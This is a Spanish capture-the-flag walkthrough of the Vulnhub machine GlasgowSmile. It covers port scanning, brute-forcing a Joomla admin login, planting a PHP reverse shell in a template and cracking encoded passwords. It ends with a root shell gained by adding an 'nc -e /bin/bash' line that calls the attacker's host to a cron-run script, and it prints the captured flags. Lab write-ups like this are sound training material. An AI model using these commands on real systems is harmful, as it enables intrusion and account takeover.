[VLN] Glasgow Smile

Hoy vamos a hackear la maquina de Vulnhub llamada GlasgowSmile. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/glasgow-smile-11,491/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@m0nique:~$ nmap -A -p- 192.168.112.138 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-17 20:44 CEST Nmap scan report for 192.168.112.138 Host is up (0.00067s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 67:34:48:1f:25:0e:d7:b3:ea:bb:36:11:22:60:8f:a1 (RSA) | 256 4c:8c:45:65:a4:84:e8:b1:50:77:77:a9:3a:96:06:31 (ECDSA) |_ 256 09:e9:94:23:60:97:f7:20:cc:ee:d6:c1:9b:da:18:8e (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.37 seconds
    Exploramos mas en detalle el puerto 80.
    sml@m0nique:~$ gobuster dir -u http://192.168.112.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.112.138 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: html,txt,php [+] Timeout: 10s =============================================================== 2020/06/17 20:45:33 Starting gobuster =============================================================== /index.html (Status: 200) /joomla (Status: 301) /how_to.txt (Status: 200) /server-status (Status: 403) =============================================================== 2020/06/17 20:47:09 Finished ===============================================================
    Vemos que tiene el directorio /joomla Si visitamos http://192.168.112.138/joomla/index.php podemos ver la pagina web, que contiene dialogos de la pelicula etc... Hacemos un diccionario con el siguiente comando:
    sml@m0nique:~$ cewl http://192.168.112.138/joomla/index.php > dicjoker.txt
    Ahora arrancamos Burpsuite, visitamos http://192.168.112.138/joomla/administrator/index.php que es donde se encuentra el panel para administrar joomla, y probaremos cualquier usario para obtener la request. Una vez hecha la request, la mandamos en Burp Suite a "Intruder" y hacemos bruteforce. Como usuario, usaremos "joomla" y como diccionario, el que acabamos de crear (dicjoker.txt). Al poco rato obtenemos los credenciales! joomla/Gotham
  • Low Shell
  • Ahora que tenemos los credenciales, nos logueamos en http://192.168.112.138/joomla/administrator/index.php Preparamos una reverse shell.
    sml@m0nique:~$ cp /usr/share/webshells/php/php-reverse-shell.php . sml@m0nique:~$ mv php-reverse-shell.php rshell.php sml@m0nique:~$ nano rshell.php # Editamos para poner nuestra ip/puerto.
    Vamos a: Extension -> templates -> templates. En styles vemos que el default es protostar, asi que vamos a Templates -> Protostar -> index.php y pegamos ahi la reverse shell. Damos a "Save". Ponemos nc a escuchar.
    sml@m0nique:~$ nc -nlvp 1234 listening on [any] 1234 ...
    Y visitamos http://192.168.112.138/joomla/index.php
    sml@m0nique:~$ nc -nlvp 1234 listening on [any] 1234 ... connect to [192.168.112.128] from (UNKNOWN) [192.168.112.138] 57540 Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux 17:57:31 up 4:14, 0 users, load average: 0.00, 0.00, 0.01 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python3 -c 'import pty; pty.spawn("/bin/bash");'
    Ya estamos dentro como www-data :)
    www-data@glasgowsmile:/$ cd /var/www/html/joomla www-data@glasgowsmile:/var/www/html/joomla$ cat configuration.php ---SNIP--- public $dbtype = 'mysqli'; public $host = 'localhost'; public $user = 'joomla'; public $password = 'babyjoker'; public $db = 'joomla_db'; ---SNIP---
    Ahora que tenemos estas credenciales, echamos un vistazo a la BBDD.
    www-data@glasgowsmile:/$ mysql -u joomla -p mysql -u joomla -p Enter password: babyjoker Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 31253 Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10 Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> show databases; show databases; +--------------------+ | Database | +--------------------+ | batjoke | | information_schema | | joomla_db | | mysql | | performance_schema | +--------------------+ 5 rows in set (0.003 sec) MariaDB [(none)]> use batjoke; use batjoke; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MariaDB [batjoke]> show tables; show tables; +-------------------+ | Tables_in_batjoke | +-------------------+ | equipment | | taskforce | +-------------------+ 2 rows in set (0.000 sec) MariaDB [batjoke]> select * from taskforce; select * from taskforce; +----+---------+------------+---------+----------------------------------------- -----+ | id | type | date | name | pswd | +----+---------+------------+---------+----------------------------------------- -----+ | 1 | Soldier | 2020-06-14 | Bane | YmFuZWlzaGVyZQ== | | 2 | Soldier | 2020-06-14 | Aaron | YWFyb25pc2hlcmU= | | 3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ== | | 4 | Soldier | 2020-06-14 | buster | YnVzdGVyaXNoZXJlZmY= | | 6 | Soldier | 2020-06-14 | rob | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ | | 7 | Soldier | 2020-06-14 | aunt | YXVudGlzIHRoZSBmdWNrIGhlcmU= | +----+---------+------------+---------+----------------------------------------- -----+ 6 rows in set (0.000 sec)
    Vemos que hay un "name" rob, igual que uno de los usuarios del sistema, asi que procedemos a ver si obtenemos su password haciendo un decode del string con base64.
    sml@m0nique:~$ echo "Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/" | base64 -d ???AllIHaveAreNegativeThoughts???
    Parece que tenemos el password :)
    sml@m0nique:~$ ssh rob@192.168.112.138 rob@192.168.112.138's password: Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue Jun 16 13:24:25 2020 from 192.168.10.172 rob@glasgowsmile:~$
  • user.txt
  • rob@glasgowsmile:~$ ls -la total 52 drwxr-xr-x 3 rob rob 4096 Jun 16 13:04 . drwxr-xr-x 5 root root 4096 Jun 15 06:34 .. -rw-r----- 1 rob rob 454 Jun 14 03:20 Abnerineedyourhelp -rw------- 1 rob rob 7 Jun 17 13:43 .bash_history -rw-r--r-- 1 rob rob 220 Jun 13 12:51 .bash_logout -rw-r--r-- 1 rob rob 3526 Jun 13 12:51 .bashrc -rw-r----- 1 rob rob 313 Jun 14 03:23 howtoberoot drwxr-xr-x 3 rob rob 4096 Jun 13 16:27 .local -rw------- 1 rob rob 81 Jun 15 04:08 .mysql_history -rw-r--r-- 1 rob rob 807 Jun 13 12:51 .profile -rw-r--r-- 1 rob rob 66 Jun 15 04:14 .selected_editor -rw-r----- 1 rob rob 38 Jun 13 16:41 user.txt -rw------- 1 rob rob 429 Jun 16 13:04 .Xauthority rob@glasgowsmile:~$ cat user.txt JKR[f5bb11acbb957915e421d62e7253d27a]
    Echamos un vistazo al fichero llamado Abnerineedyourhelp
    rob@glasgowsmile:~$ cat Abnerineedyourhelp Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, "Sgd vnqrs ozqs ne gzuhmf z ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's." Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd dmhflz. RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==
    Es un texto cifrado... tiene pinta de ser algo parecido a ROT13 asi que vamos a usar cyberchef para probar ROT13 y "modificaciones". Hacemos un "paste" del texto en Cyberchef y seleccionamos ROT13 con "amount" 1. Visitamos cyberchef y elegimos rot13 (amount1) El resultado es:
    Hello Dear, Arthur suffers from severe mental illness but we see little sympathy for his condition. This relates to his feeling about being ignored. You can find an entry in his journal reads, "The worst part of having a mental illness is people expect you to behave as if you don't." Now I need your help Abner, use this password, you will find the right way to solve the enigma. STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==
    El ultimo string parece ser base64 asi que...
    sml@m0nique:~$ echo "STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==" | base64 -d I33hope99my0death000makes44more8cents00than0my0life0
    Obtenemos lo que parece un password, vamos a loguearnos como abner.
    sml@m0nique:~$ ssh abner@192.168.112.138 abner@192.168.112.138's password: Permission denied, please try again. abner@192.168.112.138's password: Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue Jun 16 13:20:04 2020 from 192.168.10.172 abner@glasgowsmile:~$
  • user2.txt
  • abner@glasgowsmile:~$ cat user2.txt JKR{0286c47edc9bfdaf643f5976a8cfbd8d}
    Buscamos ficheros con los que podamos jugar.
    abner@glasgowsmile:/home/penguin$ find / -user abner 2>/dev/null /home/abner /home/abner/user2.txt /home/abner/.bash_history /home/abner/.bashrc /home/abner/.Xauthority /home/abner/info.txt /home/abner/.bash_logout /home/abner/.profile /home/abner/.ssh /home/abner/.ssh/known_hosts /home/abner/.local /home/abner/.local/share /home/abner/.local/share/nano /var/www/html/joker.jpg /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip
    Vemos que hay un fichero .zip algo escondido... Lo copiamos en /tmp y lo descomprimimos usando la password que hemos utilizado para loguearnos como abner.
    abner@glasgowsmile:~$ cp /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip /tmp abner@glasgowsmile:~$ cd /tmp abner@glasgowsmile:/tmp$ unzip .dear_penguins.zip Archive: .dear_penguins.zip [.dear_penguins.zip] dear_penguins password: inflating: dear_penguins abner@glasgowsmile:/tmp$ cat dear_penguins My dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!! scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
    Usamos el ultimo string como "password" para loguearnos como penguin.
    sml@m0nique:~$ ssh penguin@192.168.112.138 penguin@192.168.112.138's password: Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue Jun 16 13:20:25 2020 from 192.168.10.172 penguin@glasgowsmile:~$
    Exploramos un poco mas el sistema.
  • user3.txt
  • penguin@glasgowsmile:~$ ls -la total 40 drwxr-xr-x 5 penguin penguin 4096 Jun 16 11:58 . drwxr-xr-x 5 root root 4096 Jun 15 06:34 .. -rw------- 1 penguin penguin 7 Jun 17 13:43 .bash_history -rw-r--r-- 1 penguin penguin 220 Jun 15 06:34 .bash_logout -rw-r--r-- 1 penguin penguin 3526 Jun 15 06:34 .bashrc drwxr-xr-x 3 penguin penguin 4096 Jun 15 12:01 .local -rw-r--r-- 1 penguin penguin 807 Jun 15 06:34 .profile drwxr--r-- 2 penguin penguin 4096 Jun 16 12:52 SomeoneWhoHidesBehindAMask drwx------ 2 penguin penguin 4096 Jun 15 11:22 .ssh -rw------- 1 penguin penguin 58 Jun 15 11:20 .Xauthority penguin@glasgowsmile:~$ cd SomeoneWhoHidesBehindAMask/ penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ ls -la total 332 drwxr--r-- 2 penguin penguin 4096 Jun 16 12:52 . drwxr-xr-x 5 penguin penguin 4096 Jun 16 11:58 .. -rwSr----- 1 penguin penguin 315904 Jun 15 11:45 find -rw-r----- 1 penguin root 1457 Jun 15 11:50 PeopleAreStartingToNotice.txt -rwxr-xr-x 1 penguin root 612 Jun 16 12:50 .trash_old -rw-r----- 1 penguin penguin 38 Jun 16 12:52 user3.txt penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat user3.txt JKR{284a3753ec11a592ee34098b8cb43d52}
    Miramos tambien el otro .txt a ver si nos da alguna pista.
    penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat PeopleAreStartingToNotice.txt Hey Penguin, I'm writing software, I can't make it work because of a permissions issue. It only runs with root permissions. When it's complete I'll copy it to this folder. Joker
    Sabiendo esto, vamos a usar pspy64 a ver si "alguien" hace algo....
    penguin@glasgowsmile:/tmp$ wget http://192.168.112.128/pspy64 --2020-06-19 17:46:48-- http://192.168.112.128/pspy64 Connecting to 192.168.112.128:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3078592 (2.9M) [application/octet-stream] Saving to: ‘pspy64.1’ pspy64.1 100%[==================================>] 2.94M --.-KB/s in 0.03s 2020-06-19 17:46:48 (112 MB/s) - ‘pspy64.1’ saved [3078592/3078592] penguin@glasgowsmile:/tmp$ chmod +x pspy64 penguin@glasgowsmile:/tmp$./pspy64 ---SNIP--- 2020/06/19 17:07:01 CMD: UID=0 PID=786 | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old ---SNIP---
  • Privilege Escalation
  • Vemos que root ejecuta el fichero /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old el cual podemos editar! Agregamos la siguiente linea para obtener una reverse shell como root:
    nc -e /bin/bash 192.168.112.128 5555
    El fichero quedaria asi.
    penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat .trash_old #/bin/sh nc -e /bin/bash 192.168.112.128 5555 exit 0
    Ponemos nc a la escucha.
    sml@m0nique:~$ nc -nlvp 5555 listening on [any] 5555 ...
    Y tras un rato...
    connect to [192.168.112.128] from (UNKNOWN) [192.168.112.138] 41266 python3 -c 'import pty; pty.spawn("/bin/bash");' root@glasgowsmile:~# id id uid=0(root) gid=0(root) groups=0(root)
  • root.txt
  • root@glasgowsmile:~# cd /root cd /root root@glasgowsmile:~# ls ls root.txt whoami root@glasgowsmile:~# cat root.txt Congratulations! You've got the Glasgow Smile! JKR{68028b11a1b7d56c521a90fc18252995} Credits by mindsflee
  • End
  • Y con esto ya seriamos root de la maquina :)